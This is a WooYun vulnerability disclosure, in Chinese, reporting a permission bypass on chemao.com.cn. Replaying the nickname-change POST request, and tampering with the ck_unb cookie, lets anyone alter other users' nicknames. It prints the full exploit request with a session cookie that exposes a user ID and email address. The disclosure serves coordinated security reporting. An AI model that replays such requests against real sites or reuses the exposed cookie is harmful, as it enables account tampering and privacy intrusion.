当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:wooyun-2015-0134223

漏洞标题:车猫网某功能处逻权限绕过

相关厂商:dongdalou.com

漏洞作者: 天地不仁 以万物为刍狗

提交时间:2015-08-15 15:11

修复时间:2015-10-01 13:42

公开时间:2015-10-01 13:42

漏洞类型:未授权访问/权限绕过

危害等级:高

自评Rank:20

漏洞状态:厂商已经确认

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]

Tags标签:

4人收藏 收藏
分享漏洞:


漏洞详情

披露状态:

2015-08-15: 细节已通知厂商并且等待厂商处理中
2015-08-17: 厂商已经确认,细节仅向厂商公开
2015-08-27: 细节向核心白帽子及相关领域专家公开
2015-09-06: 细节向普通白帽子公开
2015-09-16: 细节向实习白帽子公开
2015-10-01: 细节向公众公开

简要描述:

一刀穷,一刀富,一刀穿麻布;疯子卖,疯子买,还有疯子在等待。

详细说明:

昵称那里 因为我修改过了 所以没那句话的截图了 但是意思就是昵称只能修改一次 修改过后就不能修改了 而且也没那个按钮了 但是这里是可以绕过的
比如现在我的资料是这样的

0.png


昵称那也并没有修改的按钮 然而在第一次修改昵称的时候 截取数据包 后进行重放攻击就可以修改了 比如我现在要修改昵称为 wooyun

1.png


然后我们再刷新下页面

2.png


已经被成功修改了 再配合上一个漏洞 修改参数 ck_unb 可将所有的用户昵称修改

漏洞证明:

POST /index.php?app=user&act=change_nick HTTP/1.1
Host: www.chemao.com.cn
Content-Length: 12
Accept: application/json, text/javascript, */*; q=0.01
Origin: http://www.chemao.com.cn
X-Requested-With: XMLHttpRequest
User-Agent: Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2272.118 UBrowser/5.2.3635.47 Safari/537.36
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
Referer: http://www.chemao.com.cn/user-edit.html
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.8
Cookie: globalCookieCity=%BD%AD%CB%D5; sguid=%7B%22_type_%22%3A%22string%22%2C%22_val_%22%3A%2212bb104e-1644-10eb-1eb5-194011f21227%22%7D; sgload=%7B%22_type_%22%3A%22number%22%2C%22_val_%22%3A1%7D; sgps=%7B%22_type_%22%3A%22json%22%2C%22_val_%22%3A%22%5B%7B%5C%22attr%5C%22%3A%5C%22id%5C%22%2C%5C%22val%5C%22%3A%5C%22date-scorce-1%5C%22%7D%2C%7B%5C%22attr%5C%22%3A%5C%22id%5C%22%2C%5C%22val%5C%22%3A%5C%22date-scorce-2%5C%22%7D%2C%7B%5C%22attr%5C%22%3A%5C%22id%5C%22%2C%5C%22val%5C%22%3A%5C%22date-scorce-3%5C%22%7D%2C%7B%5C%22attr%5C%22%3A%5C%22data-ms%5C%22%2C%5C%22val%5C%22%3A%5C%22mechat%5C%22%7D%2C%7B%5C%22attr%5C%22%3A%5C%22onclick%5C%22%2C%5C%22val%5C%22%3A%5C%22openEcDialog()%5C%22%7D%2C%7B%5C%22attr%5C%22%3A%5C%22class%5C%22%2C%5C%22val%5C%22%3A%5C%22cert-form-btn%5C%22%7D%2C%7B%5C%22attr%5C%22%3A%5C%22data-type%5C%22%2C%5C%22val%5C%22%3A%5C%22confirm%5C%22%7D%2C%7B%5C%22attr%5C%22%3A%5C%22class%5C%22%2C%5C%22val%5C%22%3A%5C%22MECHAT_FLOAT_CHAT%5C%22%7D%2C%7B%5C%22attr%5C%22%3A%5C%22onclick%5C%22%2C%5C%22val%5C%22%3A%5C%22mechatClick()%5C%22%7D%2C%7B%5C%22attr%5C%22%3A%5C%22id%5C%22%2C%5C%22val%5C%22%3A%5C%22confirm%5C%22%7D%2C%7B%5C%22attr%5C%22%3A%5C%22onclick%5C%22%2C%5C%22val%5C%22%3A%5C%22openEcDialog()%3B%5C%22%7D%2C%7B%5C%22attr%5C%22%3A%5C%22id%5C%22%2C%5C%22val%5C%22%3A%5C%22show_tel%5C%22%7D%2C%7B%5C%22attr%5C%22%3A%5C%22id%5C%22%2C%5C%22val%5C%22%3A%5C%22credit-btn%5C%22%7D%2C%7B%5C%22attr%5C%22%3A%5C%22id%5C%22%2C%5C%22val%5C%22%3A%5C%22sell-car-submit%5C%22%7D%2C%7B%5C%22attr%5C%22%3A%5C%22class%5C%22%2C%5C%22val%5C%22%3A%5C%22submitBtn%5C%22%7D%2C%7B%5C%22attr%5C%22%3A%5C%22id%5C%22%2C%5C%22val%5C%22%3A%5C%22byk-form-btn%5C%22%7D%2C%7B%5C%22attr%5C%22%3A%5C%22id%5C%22%2C%5C%22val%5C%22%3A%5C%22submitForm%5C%22%7D%5D%22%7D; __ag_cm_=1439555742507; _hjIncludedInSample=0; _hjUserId=548edf3a-d575-4a1d-b8fc-8fb7908192f6; sgpth=%7B%22_type_%22%3A%22json%22%2C%22_val_%22%3A%22%5B%7B%5C%22time%5C%22%3A1439555752764%2C%5C%22val%5C%22%3A%5C%22aHR0cDovL3d3dy5jaGVtYW8uY29tLmNuLw%3D%3D%5C%22%7D%2C%7B%5C%22time%5C%22%3A1439555755418%2C%5C%22val%5C%22%3A%5C%22aHR0cDovL3d3dy5jaGVtYW8uY29tLmNuL3VzZXItcHJvZmlsZS5odG1s%5C%22%7D%2C%7B%5C%22time%5C%22%3A1439555760771%2C%5C%22val%5C%22%3A%5C%22aHR0cDovL3d3dy5jaGVtYW8uY29tLmNuL3VzZXItZWRpdC5odG1s%5C%22%7D%2C%7B%5C%22time%5C%22%3A1439555783171%2C%5C%22val%5C%22%3A%5C%22aHR0cDovL3d3dy5jaGVtYW8uY29tLmNuL2luZGV4LnBocD9hcHA9dXNlciZhY3Q9b3JkZXJfYnV5ZXI%3D%5C%22%7D%2C%7B%5C%22time%5C%22%3A1439555899537%2C%5C%22val%5C%22%3A%5C%22aHR0cDovL3d3dy5jaGVtYW8uY29tLmNuL3VzZXItZWRpdC5odG1s%5C%22%7D%2C%7B%5C%22time%5C%22%3A1439556168980%2C%5C%22val%5C%22%3A%5C%22aHR0cDovL3d3dy5jaGVtYW8uY29tLmNuL2luZGV4LnBocD9hcHA9dXNlciZhY3Q9b3JkZXJfYnV5ZXI%3D%5C%22%7D%2C%7B%5C%22time%5C%22%3A1439556170760%2C%5C%22val%5C%22%3A%5C%22aHR0cDovL3d3dy5jaGVtYW8uY29tLmNuL3VzZXItZWRpdC5odG1s%5C%22%7D%2C%7B%5C%22time%5C%22%3A1439556178612%2C%5C%22val%5C%22%3A%5C%22aHR0cDovL3d3dy5jaGVtYW8uY29tLmNuL3VzZXItcHJvZmlsZS5odG1s%5C%22%7D%2C%7B%5C%22time%5C%22%3A1439556191045%2C%5C%22val%5C%22%3A%5C%22aHR0cDovL3d3dy5jaGVtYW8uY29tLmNuL3VzZXItZm9sbG93Lmh0bWw%3D%5C%22%7D%2C%7B%5C%22time%5C%22%3A1439556192708%2C%5C%22val%5C%22%3A%5C%22aHR0cDovL3d3dy5jaGVtYW8uY29tLmNuL3VzZXItcmVsZWFzZS5odG1s%5C%22%7D%2C%7B%5C%22time%5C%22%3A1439556193975%2C%5C%22val%5C%22%3A%5C%22aHR0cDovL3d3dy5jaGVtYW8uY29tLmNuL2luZGV4LnBocD9hcHA9dXNlciZhY3Q9b3JkZXJfYnV5ZXI%3D%5C%22%7D%2C%7B%5C%22time%5C%22%3A1439556195441%2C%5C%22val%5C%22%3A%5C%22aHR0cDovL3d3dy5jaGVtYW8uY29tLmNuL3VzZXItZWRpdC5odG1s%5C%22%7D%2C%7B%5C%22time%5C%22%3A1439556199854%2C%5C%22val%5C%22%3A%5C%22aHR0cDovL3d3dy5jaGVtYW8uY29tLmNuL3VzZXItcHJvZmlsZS5odG1s%5C%22%7D%2C%7B%5C%22time%5C%22%3A1439556203230%2C%5C%22val%5C%22%3A%5C%22aHR0cDovL3d3dy5jaGVtYW8uY29tLmNuL3VzZXItZWRpdC5odG1s%5C%22%7D%2C%7B%5C%22time%5C%22%3A1439556209682%2C%5C%22val%5C%22%3A%5C%22aHR0cDovL3d3dy5jaGVtYW8uY29tLmNuL3VzZXItcHJvZmlsZS5odG1s%5C%22%7D%2C%7B%5C%22time%5C%22%3A1439556221376%2C%5C%22val%5C%22%3A%5C%22aHR0cDovL3d3dy5jaGVtYW8uY29tLmNuL2luZGV4LnBocA%3D%3D%5C%22%7D%2C%7B%5C%22time%5C%22%3A1439556236036%2C%5C%22val%5C%22%3A%5C%22aHR0cDovL3d3dy5jaGVtYW8uY29tLmNuL3VzZXItcHJvZmlsZS5odG1s%5C%22%7D%2C%7B%5C%22time%5C%22%3A1439556237942%2C%5C%22val%5C%22%3A%5C%22aHR0cDovL3d3dy5jaGVtYW8uY29tLmNuL3VzZXItZWRpdC5odG1s%5C%22%7D%2C%7B%5C%22time%5C%22%3A1439556240500%2C%5C%22val%5C%22%3A%5C%22aHR0cDovL3d3dy5jaGVtYW8uY29tLmNuL2luZGV4LnBocD9hcHA9dXNlciZhY3Q9b3JkZXJfYnV5ZXI%3D%5C%22%7D%2C%7B%5C%22time%5C%22%3A1439556242448%2C%5C%22val%5C%22%3A%5C%22aHR0cDovL3d3dy5jaGVtYW8uY29tLmNuL3VzZXItcHJvZmlsZS5odG1s%5C%22%7D%2C%7B%5C%22time%5C%22%3A1439556254684%2C%5C%22val%5C%22%3A%5C%22aHR0cDovL3d3dy5jaGVtYW8uY29tLmNuL3VzZXItZWRpdC5odG1s%5C%22%7D%2C%7B%5C%22time%5C%22%3A1439556512681%2C%5C%22val%5C%22%3A%5C%22aHR0cDovL3d3dy5jaGVtYW8uY29tLmNuL2luZGV4LnBocD9hcHA9dXNlciZhY3Q9b3JkZXJfYnV5ZXI%3D%5C%22%7D%2C%7B%5C%22time%5C%22%3A1439556514284%2C%5C%22val%5C%22%3A%5C%22aHR0cDovL3d3dy5jaGVtYW8uY29tLmNuL3VzZXItZWRpdC5odG1s%5C%22%7D%2C%7B%5C%22time%5C%22%3A1439556526342%2C%5C%22val%5C%22%3A%5C%22aHR0cDovL3d3dy5jaGVtYW8uY29tLmNuL3VzZXItcHJvZmlsZS5odG1s%5C%22%7D%2C%7B%5C%22time%5C%22%3A1439556776779%2C%5C%22val%5C%22%3A%5C%22aHR0cDovL3d3dy5jaGVtYW8uY29tLmNuL3VzZXItZWRpdC5odG1s%5C%22%7D%2C%7B%5C%22time%5C%22%3A1439556851112%2C%5C%22val%5C%22%3A%5C%22aHR0cDovL3d3dy5jaGVtYW8uY29tLmNuL21hcmtldC5odG1s%5C%22%7D%2C%7B%5C%22time%5C%22%3A1439556856863%2C%5C%22val%5C%22%3A%5C%22aHR0cDovL3d3dy5jaGVtYW8uY29tLmNuL3Nob3ctaWQtMTIyNTA0OC5odG1s%5C%22%7D%2C%7B%5C%22time%5C%22%3A1439556878006%2C%5C%22val%5C%22%3A%5C%22aHR0cDovL3d3dy5jaGVtYW8uY29tLmNuL3VzZXItcHJvZmlsZS5odG1s%5C%22%7D%2C%7B%5C%22time%5C%22%3A1439556880341%2C%5C%22val%5C%22%3A%5C%22aHR0cDovL3d3dy5jaGVtYW8uY29tLmNuL3VzZXItZm9sbG93Lmh0bWw%3D%5C%22%7D%2C%7B%5C%22time%5C%22%3A1439556881636%2C%5C%22val%5C%22%3A%5C%22aHR0cDovL3d3dy5jaGVtYW8uY29tLmNuL3VzZXItcmVsZWFzZS5odG1s%5C%22%7D%5D%22%7D; _gat=1; redirectURL=%252Findex.php%253Fapp%253Duser%2526act%253Dedit; Hm_lvt_996dd03d99962cc3d2411df00b3a3e38=1439555742; Hm_lpvt_996dd03d99962cc3d2411df00b3a3e38=1439558188; _ga=GA1.3.9953835.1439555742; ag_fid=OxxEh37D397Pdc0F; uuid=21f3be7999692c886cc7e805ed462cee; FC_ID=28b1bad7619f5b89aa21651c31709bee64b90d27; ck_unb=71752; ck__nk_=177712604%40qq.com; ck__lg_=177712604%40qq.com; ck_user_type=0
nick=wooyun

修复方案:

版权声明:转载请注明来源 天地不仁 以万物为刍狗@乌云


漏洞回应

厂商回应:

危害等级:高

漏洞Rank:12

确认时间:2015-08-17 13:40

厂商回复:

感谢作者!

最新状态:

暂无


漏洞评价:

评论